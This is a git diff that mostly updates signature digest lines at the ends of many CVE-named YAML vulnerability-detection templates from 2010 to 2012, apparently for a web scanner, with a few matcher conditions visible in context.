4a0a0047304502201aeeb10c9ba1025359a69471f3a91a0f4aee8a7d5a5d58186c744fe34b5e83380221008155988c8808e70bd5d1719b7f614feb8c7bd277857e2d579c65d7b33426141b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bf5919365967ca0df8eee57607f5745d336ac2f59be0828f56067fc824c73f7e022100cef2e586cb28e2640704edd3bea58c6187bb56e02214dc5f52627a594ae89c5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index 93763fbca3..1d336d5141 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022039fed62c72d2666671cb32055afaf448be089738800601d5df4fe8ce080e9f9b022100834091ec99c4970f864aa10dfa693e25db58b37becfc2eb38a2cc24815ea1607:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210096d19eff6668bb22fefd3da78700102bd948d5cd798c008f1de471d1d154df88022100c15dd0c2d22f4372aa3d1e3060b1404d55597ece6f94a768df83cd01b1fd0843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index f75e0a9c0c..53e5f06ded 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100dc99abf5e10a4ba91af77f60735d2de646bd747eb690e1e9fbed656af460d36202204e270485334d36d006dfd8eb794f653ecc46a1ed1548e838e0c31f44b0482a4d:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022066416346d28f37fcfe29bd024d0e760fd0d842ebbeb4b802f0aa717e8542743202203f45f35dbe00934cde6bde36a8202de863ed6a51d4afe188e42cf76744732c12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index b628197c93..1b4c5e6662 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a6b256c99c159a6dab39a80ec5e7cedd002cc2d6694f884a2354e8b1d57f5771022059003e7e3d0bdebe161c99d8b9d0b993d3edf344060f5ddd142f3b10a793a855:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201af03b310e42b624945bd694c0138e5c56f83ed475bea109692c55eb50ba919c02201769b1791e91e60386adaf9a3af1bcc628d805c50fad3391fa4fe21fe32b62bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 684f2ed923..079a1a0519 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d3bd584474eb7630e0258a8e8c13c0f2a93f33f43261e5b76e7f53fee7ddf3a5022100d2f9b8533fcb1885738f7a9b849509f2ab9b56e3eb8781af099b5918958da068:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220418c16fef1ac92251ebd76aef0ce72c8afe5b7fd1653fb06e2023fa231ef6f54022100ff55ca9f0e7dc0eb3343be5d1c8321c77d8dc7e9091aa5f6a4a11913f78e4773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index f3d256859e..84e2944191 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bc82fb30952a190b21630b4bc9489b0c7fab404a03b9db991d01036e511164ae02200593c8807d6e439aed7d30ab6c9644e24e27be7e52eb01c0e772680a4deb356f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203a81b73020f72093d5acb61195b77d4cc5d62fdf069e621609b357bf56941d6d022100d194cb2cab4656c76388d03e9b2b39cc3d7afb18d45ded14a75d74bb7de328ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index ccb50444e3..370b0fedcf 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d1094529f4a4cda1df50be625bd3c840201a53a474b6c54272261a92db7cc525022100e2a3e292f525bdfdd5841c31fe70a10f3704213d781b6f7055ba077f0d0b7c75:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022045c2c8fbbc11f4fdc9b997c7a283a010f53a96e98861a34879b3eb4db0e71f1602204ba38c80ad04c9896beda23c229e91f459fabc233697ac4f2828daee447bc6fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 17ef4efdef..12ac020583 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206af608bda114df5df16e17feddc480b495abc86bad6a5141eea53c1aa9bd4c1e0220386d6b6971baa02e9789c1515b6c28452f39e93349757b3f46e3c7e450a275b6:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204f480f58b3636e02a4157500d8401fb68e28d21b06b81060dd37f952519f4b5d02204b6ae642d5833dac9da69bb0d2b45d50fb9e47cb0c5b21f1bc5911c54c6db5a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index a23dab6be5..03c11fb8dc 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202fa3b79c9addcc0668478ca38c01458f70450397a8bc72e9859fb7550ea6285c022100d1c1700002861acf7785f137ac8a8aaa1a577a0ce5ae1eef2dba0f3bf1065459:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220774c1d7bc9f946c3ac40002e106f2b4dda19dba5f2a5cc21be2ee915a55f24380220199454ecca3b9d0ce40520b1d38d5226c38e297fa6b268ad3866eca47d9f8ae6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index e8cc62129f..6b350b3985 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202e1a191887e26490eb022cfd487dd69d4574311e4a7c38a40a139940738bdb8c02210083f08c9e4e12b83edf4978832e12e8decd761e995e953600d780f1b8162d1d3d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100aaeb9258ad5919919f7bd69a891d1f77e0ddc6a1eefc3bec711cbd1304ed644102204f78a45712fc7b03d0c94ed20facb0ce8c79ebeb1d1bb28b319df9f50ea3401a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index 6817349f1c..de56b25b08 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201fa7c97661c1b3597c2bf0752446827edb061f026a25017bd3555c93b8ca9222022100beb1ef9ed877112d771daca9cbb9aabc1cb5f2d1b5c00740788f9a7f0aaa13e2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202fa041c14276a51c7bcf464a4f74b975ab06a6f63161e2046284576bcf7c12cc022100cb9eddaf246e5250f7471504a03b0d621de80450e4adfe90d67d05f20f5ea7e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index c40f1220d5..7d148a1a7f 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009868bb1202e12707737a86b121d4b5b33f9603bf9fcbcd7b881de63a856e799002201c2feb421f81cc1068b74d81394b2568ee2ece6ea8bb5bd66ace044a01191f8a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a952ab1134a8f533851dd22e52065ad1581c371f3345534d85a433fc5753e8fa022100f3cc181d81904e110b885648767feb074d9488e67704afbd2e75592a61326dff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 068f9c16d5..de787c05bc 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -44,5 +44,4 @@ http: - 'contains(body_2, "")' - 'contains(body_1, "Advanced Text Widget")' condition: and - -# digest: 4a0a00473045022100bf0b1725e6538090fa9e610d2c30c5ff41a5d513938c1d5ee5d95c5ad2d283c10220483d8d86973777832d83885b3dd6f0caf71aee694fa5ce76ed94e9b6237516d9:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220759bcc37f8961a8612be58d36bddf056eccc8cdc94c9094cf27cf68b6af89e000220748db003e507392a740ffded2b37ce4275cef338ed078009e1b1b6bbe2f37805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 4143ad9b1b..fd461c54d1 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220421becd619a54e5a2b2b85b2ac42dc72c9325a00ac5bcfe9d672c47edba4c80c02202a7babff8fe0734808ebb24c36432ae9092545baf06e6246997ee1b31566e148:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a6f71eebd16546cf4b7a590058e079c3ed7803e453312d980fbaf4418949fabf022100a6a674a3cb380c5c896ecda3e56dbb10518c8b5410c99f49733fce92ec2721ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 4ea397ac7a..4e580320fd 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210098f755eecb0c991ffd697980f76baf009619a46ea5dbea1df9399baa64a201e4022100cec896f587f8793556c18e47afe1505006a2df12ad5f3de0486831c21e824b48:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202004774b12cce520c9069f3b2e2afd725bfa0d0153d4221a7e26c3ed65330988022100c07c2a9ba8431790592d273ae9728fc626d9a8b4288f5ae6704fcdaf1adbd1ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index d6e1260d7c..6ac752d9fe 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203ca5db7989bbd28920ae2547c34c6c064ce9d12cc9b4887e1a799934f27d3fca022012abae00d56d637dda7a5c3469a1e1e2da527433170fd57b479981ecd45578a8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100981a7ba84f322310216245361d6e355f64613376fed0fd291aa8d58b053d258d022079781e474aebcab735b11c681571f483a7ce357f6ab439244ec0916bb9f183bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 97477aa106..48384981e0 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220152affed81a1cea0e15a57b10458e1f4a9bde9edd01cb94337255009189839cf022008f2cdc5e24ab6b9a96da7ed4d1ceaaf636e4dd43698c8dd60d938210b4b21dc:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220073541b2b4dbe59c6db7e7ea998db7d852520d1148c627a6744048191eeff3d502207c5846eafaad3f16221ed322df0be6b8aec1bf11e8e23e97c76f8c68097f75d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 5f37656355..dcc2475239 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210092a260fab913409a5f13ecc87e19da51b86b39511bfbf349083c6b70f469f735022031566c594211caf571d9972ee7a224c218cc4d6f908fda9e4e59a73c58065637:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207370f8a6e859532a8dc056bd576c45d6753511677374ae54ac9e6b90de672bb702201d23c02cf3d602d52f03e84d2c6c671866ce9a52d69753d439faf63fcd5f6ede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index fd8cc40999..5992d327c4 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100859ebb452cf9ceb630d4c176fa323982367be9dd75fd1dad2f1687a608a18d5a022100ba0080f76fca7ff6f32842d17c28b96818ea8ababf74ada391b08e2c6d5b4e2b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210084c9c4e40e7ee92c239a0f7464e83c54321bca75e73683fe7c34953caeeef018022072f288ae398022ac1b05e066516dc5b5df55bf3e8a6bd050334c45fbf398621b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index bd9d6f5691..d86d8cd23f 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203cb8c3b4f554203d33a5f8fab089db937ffba0862139e503ac25b33cbff5e42b02201f0bd243c366437485f92b9a34d9c725567df026756003733d7efa96cf4f7344:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201b3e05f7f0d3807516121df1127b94cd0539c06e602bb4eb62d8f310a3f4346a02202fca3f9eafa606a34110d30a4c9679665b7b139e6653af9d3e43ac14fd1bf1d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index b621115ed7..fd2ce2ac9e 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a00473045022100b0ec41efab2f2cd00985db6e6a7774672150c4f2829350fdb1566351101281df022036415a60afbc0832cf55bc13a4ba5ce2ce3a55604aa4b90485a5a542cac8c729:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220291ea903ad2287e4bc09ebc3cff122e6eb1735c26650dd14eaa618eb8158d0800221008b763d329f5d2116af0fc17acb9fface88d6195d0366962617e0b36f16918979:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 71d23f8ea4..38e7a3bab1 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d66fef0509892090c34a4fcb1cb45d9b21fdb90f3715b5c870608d78f4d583b702206b5a5f2242bf2fb41781fd1aa8da3092b82a928ae71d87d2d47c8f4b00d131c7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c6c035513e81cfdb3bf8a868cc00381c2b5df927ad3dc843b9fda75545b11e8402210085c0e9d9817f8e524dec10e756720afc000eeeec330c40704442a52e937d7333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index ebe45d2e2d..a9d65ddef4 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e2cfe3876954ae7069da13117ccfeed106412e3c9147aa343e287dbe2c5df73602200def57d3742552436b7dd920e02ea6e97f1d2846877219ca05fa9fdac1a8f6b0:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201e45154016b7f68302449a8eb883faf668ff6efd9eb4e80a5abb4762db1bd3d102203922a71f2c543ca257efd9fef349d1e5b600a85f50d091dc978084fe3a409b79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 001145c9e9..c7d3a51108 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100df936ad44a1b7cb7af93dff236e615c622064e43517d293418673af09648af940220095e73526d3f0622b418107b77adac30ea9625441a996b16c03fa22364ff1e32:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100afbe9a4277c80d97e8de73700c8cb88e50effcca5298bd5bfd24c1d67af9bbf10221009c8dd44e97368c0abf096baad773cebfcfdf54628e41c6cf24a97ceaca084a1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index ad8501225e..424e6a235b 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022069511f7b6beaf9a678f75e23bd54886ac8b0f3d81493828053508c6299ee4add02200d68bbe5e865bea54dd4b6791ac9b69252affb4326ff04a6c051b5c7e3f53a06:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d753cc4e845e296fcf069957be9e42c0fa882a0f08fc701fd431d126c4644e83022100f1e60c5ae0a2f4d2ded0793264f1db330b63cf8b98e30780757652f2e6343854:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index c7df7b9c9f..cab44a93a8 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008cc19333241db73c372ade3e4d420d50e49efd3e4a3015b9465f172277fae64d02200ddb40ec07977274add7e787903128a922122ad612c51ef41d9e42da5ed80e68:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b1446782e489423a8ec417ccdcae44c10174aca8c871c1354ce626ab5c57cd1802206b32617d345c481c362d317c5c5a311989a4aff9716b71c6b864157b66cd8c52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 9008f7ae3f..47d61dc053 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220396dde121c33a587159b367b16b2ff42fa7c49ab196d95302217822071b3add002200562afb284a634652c173d677d791b532270e67d22bbf3ad172b83484fd11b92:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220215f7e0457c5d9ee5bce08ae3ea7ca794d798f9eb7a379c9997c4829f8090b2e0221008256f1e777ca2efc61e1bd31913c7816edc70eef719b403ac7279ec4da2119d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index ca1aca072f..053650127e 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100dcab407ff801dcc8d1c6988795f83c4740d7e336518446d7099f726f2d80c4d20221008e8d3630d8a53a8f5eeb8559c8b5ecc9af8c546e7fdee62602447fee66360409:922c64590222798bb761d5b6d8e72950 +# digest: 480a00453043021f5f66ab6bb6f97fc5cb85a0f71d9dbf30a3390ecd8c81874e9367ad7fa4083102205af0f0e4a25af236a567b21d26c1fea0c7b1e2a71cddd43cbdf16121d4d090e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index d5b5bd1aa2..c3319f9d2b 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b2f0eb48534986064ae21ff13c28ef644484cdd6a9cb6ab45b6c291abe747069022075880aa4611c0bd4abebfc48ce9a8e0201de578ba6f8d24439142fe4840da49d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210099de1f8d60ab1a819397c6ff87839d9788f3f9a9de66e518ee4138f9fd4274fe0221008901481f8d689da8216a7e652f05ccf7e8e7a4bc880c386e3773d9c0fe0a1ce1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index 6a1ce93328..814d3c6f8f 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -45,5 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - -# digest: 4a0a00473045022004049fc939e7aca2beb0407b268fe88b4c6ab76a92d931c3f8dd2a1e6a8a0271022100b3287a6b8247a160a10dae5c0c2911eb014e4c194465b72e49f2e14b31d48bea:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022029ad403d16b3bf54ad9260a9588eef3a7489c743ffaec94c8fd878a02df6a6e1022100a651f2b25992dd0124e2562bf776759ef861a69b37d6b87c39bab51db7a57a7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 21f70b6724..895e649bd7 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220159667818abd9cbde9110c72e55448920a98cc72fc72667f576b4abef590167a02210091cad44ff153518cb1cb80cc9b83412170750586738b4b4d59504ac3e5328f7f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bd3021b42ed7d78317c4bcef3cf1de7f1c680fa8c22769705ec0d43362af5deb022100e8bbb05ae858adb9c87c5f3092d119b00ea6294527eedab59f0bcaa093ffffaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 02ff4f9022..fed0edf31b 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d36a4188433912b5f8d182aa03de240bf8a0dca4887832964a9a6c4544ce4cfd02201c17b0ad5299514c70c44bc98f21955bb16231ed834a7f038e692f06e4515a88:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009b0a40688ccd95a6ef7f1da59a9cbfdb60505d7026c371a9fbdd82fc27bafee10220377f8749f85498e421fc08adb042da1d4d57b1f41f35f94fafc66bc121488a89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 4dd4e24a99..e56f81426f 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008d9f4bae75efece65b9088bfdd99a8afa15bd4cffc6b1d709c73352c0473bd13022100941e64d8ab633df1673789dc074540bae6f2054c5da09752d2327a2563f64db3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c8536054e08abde7b5b42e1e73da7144315a4b33273c932d88c57d1c6065cac002200e93d96037b3de5af5132c4465cae9e69831cb57266c9e6a7542a2b281338ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 2db8281df7..6de1015585 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009b4c10e16fee7c93a6acff549819b1d7a693c438f9de6992271086a192f81d650221008ea6d8dde37d751e4acf1fa60c1a4a6bc341dd2b3d829f1f807bfa079968abb6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d39adcfed0754746eff0463e98bbd4b99556de6102cbed7688d3aa0ffa3058ee022100efe9032bd2d03dd971c9450b2b6bec2824a0ed6bcaf0260594e7fd7880ec3387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 778c29e2c4..01c7087337 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210085131c5e87ea4fc813646ad8a2c857977ad49b84c5d70492e2324b714cfc744b022069acefc380d77c270ce45626b88bda31f3f6762c2fb88a5345454e422cfd258c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009283a18df95d90c599b61219f74c03725190782ae9edc675beea29ffecdc5be9022100f7302e4fcaa96721ec18fdef884784e07d9b63b44b0b63e3d51efae3468953b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 35bbf9ff33..e83b2c8f1d 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bb975bb8283c0b385016615dc2b9db4b83c713816c0e6e44de42680aa0c9d3d7022100a43720cf3abd6a8e50d1cbd2fa748bb7f0c501b7d48be22976647c131af039ad:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008b0c8fa93e861aa01b64e4d699bba5776be5463f67649d8e1568d00ac8d9673d0220624f58a3058a6db6728de973ca859450db00ba5b23e9aa1a832592a37eeab55b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 1a84dd261e..4f2327a460 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022007945ad487c89dd54e8f134841d3ea3868604fe8662072923113592082f43fd9022100c7b3380ef304db0712af561d24d81e8a0459a1e0c8f371f711e1f1221354f212:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022015376f0eee60e38c5b29b0c4d05956e366a6223b0556c13e84a3ba3aa36f30b60220455865ceb3ad015175858bd43e22a00ba5f244387a3412bfd3c2a1fe4c30c3e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 95d1f2c6f0..18e713217c 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -40,5 +40,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 4a0a00473045022100bb0032522147c34cfc6a2daa0d996982cb745d398167fb6c314404c335542f7202206fa10c99cb452edf46236d2cec852180b0018c06996cbe9fb573b725fa620cdf:922c64590222798bb761d5b6d8e72950 +# digest: 